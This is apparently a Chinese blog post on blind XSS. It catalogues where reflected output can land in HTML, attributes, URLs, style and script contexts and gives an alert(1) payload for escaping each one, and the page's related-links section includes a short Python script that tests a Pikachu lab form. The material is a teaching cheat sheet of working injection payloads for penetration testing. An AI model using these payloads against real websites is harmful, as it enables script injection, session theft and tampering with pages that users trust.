XSS盲打

最新推荐文章于 2023-05-31 09:18:03 发布
最新推荐文章于 2023-05-31 09:18:03 发布
阅读量2.6k 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Naive_boy00/article/details/49147739
版权

XSS的查找:绕过过滤机制,利用服务端错误的编码方式

例:url:http//www.foo.com/xss.php?id=1

HTML标签之间
<div>[输出]</div> //xsspayload:<script>alert(1)</script>
标签之间无法执行脚本,要先闭合掉对应的标签。此类标签有:
<title></title>
<textarea></textarea>
<xmp></xmp>
<iframe></iframe>
<noscript></noxcript>
<noframes></noframes>
<plaintext></plaintext>
//xsspayload:</title><script>alert(1)</script>
HTML标签之内
作为一般属性值
<input type="text" value="[输出]" />
//xsspayload:
        闭合属性:"onmouseover=alert(1) x="
        闭合属性后闭合标签:"><script>alert(1)</script>
输出在URL等src/herf/action等属性
xsspayload:
    各种闭合
    使用伪协议(前提是payload出现在属性url的开头部分):
         javascript:alert(1)
         如果网站过滤了/'"等特殊字符
         javascript:alert(1)-//利用JavaScript逻辑与算数运算符
         window.onerror = function(){return true;}//抑制浏览器报错
输出在事件

需区分是作为整个事件还是某个函数参数

输出在style属性内

xsspayload:IE下注入expression关键值:1;xss:expression(if(!window.x){alert(1);window.x=1;})
效果如下:

JavaScript代码的值
<script>a="[输出]";....</script>
xsspayload:
    闭合标签:</script><script>alert(1)//
    闭合变量的值引用:";alert(1)//
    (如果//被过滤可以使用逻辑与算术运算符来代替)
成为CSS代码的值

与输出在style属性内一样

存储型XSS

一般是表单的提交,然后进入服务器端存储,最终在某个页面上输出。(找输出点)

Naive_boy00
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xss盲打、过滤、htmlspecialchars、herf输出、js输出
weixin_51446936的博客
06-02 1718
一、XSS盲打 1.盲打概述 “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。 也就是只有从后台才能看到前端输入的内容,从前端无法判断是否存在xss 2.实验演示 第一步:打开pikachu的xss盲打,随便输入信息 第二步:模拟后台管理员,登录后台进行查看(右上角
JavaScript之Style属性学习
weixin_33804990的博客
08-09 133
当CSS使用伪类开始侵入DOM和JavaSCript所控制着的行为层时,DOM和JavaScript也使用他们的一系列样式去控制表现层,这篇随笔主要说的就是利用JavaScript去控制元素的表现形式,   一、Style属性 文档中的每一个元素都是一个对象,每个对象又有着各式各样的属性。有一些元素告诉我们元素在节点树上的位置信息。比如说,parentNode、nextSibling、pre...
漏洞挖掘
Jim的博客
09-06 989
alert() 弹出个提示框 (确定)  confirm() 弹出个确认框 (确定,取消)  prompt() 弹出个输入框 让你输入东西
XSS小结
wkend的博客
10-19 1516
XSS是什么? XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。 XSS会造成那些危害? 攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...
Web的基本漏洞--XSS漏洞
尽欢的博客
05-31 3321
XSS漏洞介绍、XSS漏洞的攻击方式--注入脚本代码
xss平台源码
09-28
1. **XSS盲打**:该功能允许用户输入XSS payload,然后平台会在后台尝试在目标环境中执行这些payload,而不直接显示结果。这对于避免触发网站的防护机制或者防止payload被过滤很有用。 2. **Payload库**:平台可能...
Xss Scan tool
05-25
Xss Scan工具是一款专为网络安全专业人士设计的插件,它集成在Burp Suite这款流行的网络安全测试平台上,主要用于检测和识别Web应用程序中的XSS(跨站脚本)漏洞。XSS攻击是网络安全领域的一个重要问题,它允许攻击...
springboot整合XSS
03-20
本文将深入探讨如何在Spring Boot项目中整合并预防XSS(Cross-Site Scripting)攻击。XSS是一种常见的网络攻击方式,通过注入恶意脚本到网页中,来窃取用户数据或者执行恶意操作。 一、理解XSS攻击 XSS攻击主要...
第26天:WEB漏洞-XSS跨站之订单及Shell箱子反杀记1
08-03
1. **订单系统XSS盲打**:攻击者通过订单系统注入XSS代码,当管理员查看订单详情时,恶意脚本执行,可能窃取敏感信息。 2. **Shell箱子系统XSS盲打**:利用Shell管理工具的输入验证不足,注入XSS,获取服务器控制权...
XSS攻击检测
01-22
XSS(Cross-site scripting)攻击是一种常见的网络安全威胁,它利用了网站对用户输入的不当处理,使得攻击者能够在网页上注入恶意脚本。这些脚本可以在用户的浏览器中执行,从而获取敏感信息、操纵用户界面或者传播...
java 预防XSS攻击
08-23
在Java开发过程中,XSS(Cross Site Scripting)攻击是一种常见的安全威胁,它允许攻击者在用户的浏览器上执行恶意脚本。XSS攻击通常发生在Web应用程序未能充分验证或过滤用户输入的情况下,使得恶意代码能够被嵌入...
XSS练习平台
07-17
XSS(Cross-Site Scripting)攻击是一种常见的网络安全漏洞,主要发生在Web应用程序中。它允许攻击者通过在页面上注入恶意脚本,从而对其他用户实施欺诈或窃取敏感信息。XSS练习平台是一个用于学习和提升XSS防护技能...
XSS学习大全
05-02
XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它发生在Web应用程序未能充分验证或过滤用户输入的情况下。这种漏洞允许攻击者注入恶意脚本到网页上,当其他用户浏览这些被篡改的页面时,恶意脚本会在他们的...
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
XSS.rar_XSS
09-22
XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的网络安全问题,尤其是在Web前端开发中尤为突出。XSS攻击允许攻击者在用户浏览器上执行恶意脚本,从而窃取用户数据、操纵用户界面或者执行其他有害操作。以下...
XSS初探
GANDALF THE WHITE的博客
12-10 555
1、XSS攻击一般通过留言、电子邮件或者其他途径向受害者发送一个精心构造的恶意URL,当受害者在WEB浏览器上打开该URL的时候,恶意脚本就会在受害者计算机上执行。(别小看这句话,当你真正理解XSS的时候,你会发现,这就是XSS的全部精髓。至少我现在这么认为) 2、一般实例: (1)XSS输入为HTML代码段,使网页不停地刷新,代码为: (2)XSS输入嵌入其它网站连接,代码为:
Pikachu靶场:XSS盲打
witwitwiter的博客
04-17 2072
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果。 xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以
关于xss盲打关于xss盲打
u012614598的专栏
11-21 1004
关于xss盲打关于xss盲打      又到了各种年终总结的时候了,先祝各位看官“圣诞快乐”。我记得有朋友问我在2012年里有没有“猥琐流”比较出彩的东西时,我给的答案是“xss盲打”!   关于“盲打”这个词语的出现,最早应该是在wooyun里id为“胯下有杀气”的马甲提出的。最早的一个wooyun案列是2012年7月提交的《WooYun-2012-09547》 ,由此xss盲打火了起来,
xss(跨站脚本攻击)详解
lonmar的博客
06-25 5415
xss跨站脚本攻击 读书心得,技术总结
写一个python脚本检测pikachu靶场的xss盲打
最新发布
06-03
好的,下面是一个简单的 Python 脚本,用于检测 pikachu 靶场的 XSS 盲打漏洞。 ```python import requests # 构造请求 url = "http://your-pikachu-url.com/vulnerabilities/xss_s/" payload = "<script>alert('xss vulnerable')</script>" cookies = {"security": "low"} response = requests.post(url, data={"txtName": payload}, cookies=cookies) # 判断是否存在漏洞 if payload in response.text: print("XSS 漏洞存在!") else: print("未发现 XSS 漏洞。") ``` 你需要将 `url` 替换为你自己的 pikachu 靶场的 URL,然后运行脚本即可。脚本会构造一个包含 XSS 代码的 POST 请求,然后判断响应中是否包含这个代码,如果包含则说明存在漏洞。 当然,这只是一个简单的示例脚本,实际使用中可能需要根据具体情况进行修改和完善。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值